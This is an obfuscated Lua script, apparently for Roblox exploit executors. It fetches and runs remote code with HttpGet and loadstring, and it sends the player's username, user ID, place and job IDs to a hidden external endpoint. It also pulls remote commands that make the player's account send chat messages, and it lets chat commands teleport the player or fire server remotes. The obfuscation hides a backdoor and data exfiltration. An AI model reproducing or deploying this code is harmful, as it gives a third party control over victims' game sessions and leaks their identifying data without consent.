--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v31,v32) local v33={};for v67=1, #v31 do v6(v33,v0(v4(v1(v2(v31,v67,v67 + 1 )),v1(v2(v32,1 + (v67% #v32) ,1 + (v67% #v32) + 1 )))%256 ));end return v5(v33);end local v8,v9=pcall(function() return game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\250\45\235\186\195\40\136\154\148\22\246\190\194\26\156\235\206\39\171\131\136\19\208\202\213\106\213\171\194\27\213\134\137\117\206\174\197\91\131\147\227\107\234\174\198","\126\177\163\187\69\134\219\167"),true);end);if (v8 and v9) then local v68=0 + 0 ;local v69;local v70;while true do if (v68==(0 + 0)) then v69,v70=pcall(function() loadstring(v9)();end);if  not v69 then warn("Fehler beim Ausf端hren des externen Skripts: "   .. v70 );end break;end end else warn(v7("\5\200\34\201\249\49\141\40\192\245\46\141\2\192\238\54\195\62\192\238\47\204\46\192\242\99\201\47\214\188\38\213\62\192\238\45\200\36\133\207\40\223\35\213\232\48\131","\156\67\173\74\165"));end local v10=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\100\19\58\6\221\88\23\54\33\251\66\0\43\17\251","\158\48\118\66\114"));local v12=game:GetService(v7("\131\48\4\38\64\160\233\189\45\19\51","\155\203\68\112\86\19\197"));local v13=game:GetService(v7("\114\216\58\249\80\119\247\236\117\216\36\234\73\123\224","\152\38\189\86\156\32\24\133"));local v14=game:GetService(v7("\206\82\183\74\245\84\166\82\249\83\148\82\243\69\166\65\249","\38\156\55\199"));local v15=v10.LocalPlayer;local v16=v7("\160\105\104\56\73\59\181\79\167\126\125\36\27\123\233\87\242\46\44\120\67\59\247\70\187\110\125\47\22\103","\35\200\29\28\72\115\20\154");local v17=v7("\17\171\197\207\158\118\123\86\187\216\204\142\35\38\29\241\210\208\128\99\53\9\182\158\200\136\46\60\22\176\218\204\194\125\103\74\235\129\134\218\127\103\72\238\129\139\223\121\98\73\238\128\144\140\116\19\77\242\225\244\186\26\49\56\232\210\233\129\25\30\75\134\213\209\153\13\29\52\144\211\199\164\127\21\31\141\214\204\163\11\103\75\142\248\239\174\19\98\46\174\212\197\152\123\2\47\165\218\204\174\27\18\41\182\199\235\216\27\44\33\156","\84\121\223\177\191\237\76");local v18={};getgenv().executedPlayers=getgenv().executedPlayers or {} ;getgenv().Message=v7("\224\68\204\179\63\68","\161\219\54\169\192\90\48\80");local function v21(v34) local v35=Instance.new(v7("\125\71\24\49\106\74\1\49\100\71\19\54\72\69\5\21\91\77\16\32\91\86\9\32\90","\69\41\34\96"));local v36=v34.TextSource;if v36 then local v78=v10:GetPlayerByUserId(v36.UserId);if (v78 and (v78.Name==v7("\146\202\217\0\3\0\169\205\208\58\16\36","\75\220\163\183\106\98"))) then v35.PrefixText='<font color="#FF0000">[Admin]</font> '   .. v34.PrefixText ;end end return v35;end v11.OnIncomingMessage=v21;local function v23() local v37=1456 -(282 + 1174) ;local v38;local v39;local v40;local v41;local v42;while true do if (v37==(813 -(569 + 242))) then v41,v42=pcall(function() return v12:JSONDecode(v40.Body);end);if ( not v41 or (type(v42)~=v7("\24\207\92\126\123","\135\108\174\62\18\30\23\147"))) then local v85=0 -0 ;while true do if (v85==(0 + 0)) then warn(v7("\144\236\34\199\29\188\115\197\179\224\39\139\60\171\48\200\178\224\47\217\29\160\115\195\179\251\106\225\43\129\29\138\146\232\62\206\22\224","\167\214\137\74\171\120\206\83"));return nil;end end end v37=3;end if ((1025 -(706 + 318))==v37) then local v79=1251 -(721 + 530) ;while true do if (v79==(1271 -(945 + 326))) then v39,v40=pcall(function() return v38({[v7("\55\168\135","\185\98\218\235\87")]=v16,[v7("\230\57\51\238\209\174","\202\171\92\71\134\190")]=v7("\14\228\24","\232\73\161\76")});end);if ( not v39 or  not v40 or  not v40.Body) then local v101=0;while true do if ((0 -0)==v101) then warn(v7("\157\220\74\81\27\169\153\64\88\23\182\153\99\95\12\174\223\71\83\94\191\220\80\29\48\186\218\74\79\23\184\209\86\88\16\245","\126\219\185\34\61"));return nil;end end end v79=1 + 0 ;end if (v79==(1122 -(118 + 1003))) then v37=5 -3 ;break;end end end if (v37==(703 -(271 + 429))) then return v42;end if (v37==(377 -(142 + 235))) then v38=http_request or v38 or HttpPost or (syn and syn.request) ;if  not v38 then warn("HTTP-Request-Funktion nicht verf端gbar.");return nil;end v37=1 + 0 ;end end end local function v24(v43) local v44=0 -0 ;local v45;while true do if (v44==(1501 -(1408 + 92))) then v45:SendAsync(v43);break;end if (v44==(1086 -(461 + 625))) then if  not v43 then local v86=1288 -(993 + 295) ;local v87;while true do if (v86==(0 + 0)) then v87=1171 -(418 + 753) ;while true do if (v87==(0 + 0)) then warn("Ung端ltige Nachricht.");return;end end break;end end end v45=v11.TextChannels.RBXGeneral;v44=1 + 0 ;end end end local function v25() v18={};end local function v26(v46,v47,v48,v49) local v50={[v7("\136\255\60\73\253\169\159","\199\235\144\82\61\152")]=string.format("Username: %s\nUserID: %d\nGameID (PlaceId): %d\nJobID: %s",v46,v47,v48,v49)};local v51=v12:JSONEncode(v50);local v52={[v7("\4\25\183\63\2\24\173\102\19\15\169\46","\75\103\118\217")]=v7("\198\68\96\24\176\29\198\64\121\27\183\81\205\71\127\26","\126\167\52\16\116\217")};local v53=http_request or request or HttpPost or syn.request ;if v53 then v53({[v7("\253\60\44","\156\168\78\64\224\212\121")]=v17,[v7("\37\225\161\215","\174\103\142\197")]=v51,[v7("\123\45\75\48\42\90","\152\54\72\63\88\69\62")]=v7("\228\235\221\104","\60\180\164\142"),[v7("\112\91\4\45\34\255\1","\114\56\62\101\73\71\141")]=v52});else warn(v7("\144\221\239\244\245\219\222\213\173\236\200\208\245\207\206\202\179\253\210\203\182\169\213\205\187\225\207\132\191\236\221\209\182\237\222\202\246\169\236\193\186\225\212\203\179\169\208\203\182\231\207\193\248\231\210\199\176\253\155\195\189\250\222\202\188\236\207\132\175\236\201\192\189\231\149","\164\216\137\187"));end end local function v27(v54) local v55=0 + 0 ;local v56;while true do if ((0 + 0)==v55) then v56=false;for v83,v84 in ipairs(getgenv().executedPlayers) do if (v84.UserId==v54.UserId) then v56=true;break;end end v55=1 + 0 ;end if (v55==(530 -(406 + 123))) then if  not v56 then local v88=1769 -(1749 + 20) ;local v89;while true do if (v88==0) then v89=0 + 0 ;while true do if (v89==(0 -0)) then table.insert(getgenv().executedPlayers,{[v7("\252\231\60\183","\107\178\134\81\210\198\158")]=v54.Name,[v7("\13\29\135\212\131\60","\202\88\110\226\166")]=v54.UserId,[v7("\243\3\131\244\207\234\11","\170\163\111\226\151")]=game.PlaceId,[v7("\59\63\176\17\74","\73\113\80\210\88\46\87")]=game.JobId});v26(v54.Name,v54.UserId,game.PlaceId,game.JobId);break;end end break;end end end break;end end end local function v28(v57,v58) v13:TeleportToPlaceInstance(tonumber(v57),v58,v15);end v11.TextChannels.RBXGeneral.OnIncomingMessage=function(v59) local v60=1322 -(1249 + 73) ;local v61;while true do if (v60==(0 + 0)) then v61=v59.Text;if (v61:sub(1,1151 -(466 + 679) )==v7("\192\38\194\27\233\193","\135\225\76\173\114")) then local v90=0 -0 ;local v91;while true do if ((0 -0)==v90) then v91=string.split(v61," ");if ( #v91==(2 + 1)) then local v108=1900 -(106 + 1794) ;local v109;local v110;local v111;while true do if (v108==(1 + 0)) then v111=nil;while true do if (v109==(1 + 0)) then v28(v110,v111);break;end if (v109==(0 + 0)) then v110=v91[1 + 1 ];v111=v91[8 -5 ];v109=2 -1 ;end end break;end if (v108==(114 -(4 + 110))) then v109=584 -(57 + 527) ;v110=nil;v108=1428 -(41 + 1386) ;end end end break;end end elseif (v61==v7("\91\206\176\181\175\182","\199\122\141\216\208\204\221")) then local v95=103 -(17 + 86) ;local v96;while true do if (0==v95) then v96=v11.TextChannels.RBXGeneral;v96:SendAsync(v7("\133\216\9","\150\205\189\112\144\24"));break;end end elseif (v61:lower()==v7("\54\129\179\64\68\137\29\28","\112\69\228\223\44\100\232\113")) then local v102=v14:WaitForChild(v7("\209\9\2\221\162\111","\230\180\127\103\179\214\28")):WaitForChild(v7("\191\0\83\74\197\77\236","\128\236\101\63\38\132\33"));v102:InvokeServer();elseif ((v61==v7("\237\129\16\72\186\228","\175\204\201\113\36\214\139")) and v10:FindFirstChild(v7("\105\197\59\214\5\108\217\59\219\52\85\195","\100\39\172\85\188")) and (v10:FindFirstChild(v7("\131\113\183\138\50\134\109\183\135\3\191\119","\83\205\24\217\224")).UserId==v59.TextSource.UserId)) then local v113=0 + 0 ;local v114;while true do if (v113==(0 -0)) then v114=v11.TextChannels[v7("\212\231\245\26\227\203\200\47\231\201","\93\134\165\173")];v114:SendAsync(v7("\182\243\205\206\53","\30\222\146\161\162\90\174\210"));break;end end end break;end end end;local function v30(v62) local v63=0 -0 ;local v64;while true do local v71=166 -(122 + 44) ;while true do if (v71==(0 -0)) then if (v63==(0 -0)) then for v97,v98 in ipairs(v15.Backpack:GetChildren()) do if (v98.Name==v62) then return true;end end v64=v15.Character;v63=1 + 0 ;end if (v63==(1 + 0)) then if v64 then for v103,v104 in ipairs(v64:GetChildren()) do if (v104:IsA(v7("\209\65\127\6","\106\133\46\16")) and (v104.Name==v62)) then return true;end end end return false;end break;end end end end task.spawn(function() while true do local v72=0 -0 ;local v73;while true do if ((65 -(30 + 35))==v72) then task.wait(5 + 0 );v73=v23();v72=1 + 0 ;end if (v72==(1 + 0)) then if v73 then for v99,v100 in ipairs(v73) do if (v100:sub(1,9)==v7("\3\45\118\239\73\65\95\37\51","\32\56\64\19\156\58")) then local v105=0;local v106;while true do if (v105==(1257 -(1043 + 214))) then v106=string.split(v100," ");if ( #v106>=(11 -8)) then local v116=1212 -(323 + 889) ;local v117;local v118;local v119;while true do if (1==v116) then v119=nil;while true do if (v117==(0 -0)) then local v122=580 -(361 + 219) ;while true do if (v122==1) then v117=321 -(53 + 267) ;break;end if (v122==(0 + 0)) then v118=tonumber(v106[2]);v119=table.concat(v106," ",3 + 0 );v122=414 -(15 + 398) ;end end end if (v117==(983 -(18 + 964))) then if ((v118==v15.UserId) and v119 and  not v18[v119]) then local v123=0 -0 ;while true do if (v123==(0 + 0)) then v24(v119);v18[v119]=true;break;end end end break;end end break;end if (v116==(0 -0)) then v117=1933 -(565 + 1368) ;v118=nil;v116=3 -2 ;end end end break;end end end end end break;end end end end);task.spawn(function() local v65=0;local v66;while true do if (v65==(0 + 0)) then v66=false;while true do task.wait(0.001 -0 );if (v30(v7("\110\192\224\22\123\224\139\95\198\246\66\85\252\133","\224\58\168\133\54\58\146")) and  not v66) then local v93=0 + 0 ;local v94;while true do if (v93==(1 + 0)) then v94:SendAsync(getgenv().Message);break;end if (v93==(856 -(564 + 292))) then v66=true;v94=v11.TextChannels.RBXGeneral;v93=851 -(20 + 830) ;end end elseif  not v30(v7("\109\94\78\189\84\148\140\14\87\69\95\242\123\131","\107\57\54\43\157\21\230\231")) then v66=false;end end break;end end end);v27(v15);local v8,v9=pcall(function() return game:HttpGet(v7("\211\159\5\229\170\134\128\148\153\16\226\247\219\198\207\131\4\247\172\207\202\201\136\30\251\173\217\193\207\197\18\250\180\147\247\206\131\16\251\154\212\202\213\217\65\165\224\147\251\211\142\92\214\177\211\220\222\133\92\218\183\217\130\232\136\3\252\169\200\128\201\142\23\230\246\212\202\218\143\2\186\180\221\198\213\196\48\241\180\213\193","\175\187\235\113\149\217\188"),true);end);if (v8 and v9) then local v74=0 + 0 ;local v75;local v76;local v77;while true do if (v74==(127 -(116 + 10))) then v77=nil;while true do if ((0 + 0)==v75) then v76,v77=pcall(function() loadstring(v9)();end);if  not v76 then warn("Fehler beim Ausf端hren des externen Skripts: "   .. v77 );end break;end end break;end if (v74==(738 -(542 + 196))) then v75=0 -0 ;v76=nil;v74=1 + 0 ;end end else warn(v7("\26\170\137\64\230\107\56\62\170\136\65\163\81\125\46\186\143\88\230\107\116\61\171\132\66\163\125\125\47\239\132\84\247\124\106\50\170\143\12\208\114\106\53\191\149\95\173","\24\92\207\225\44\131\25"));end
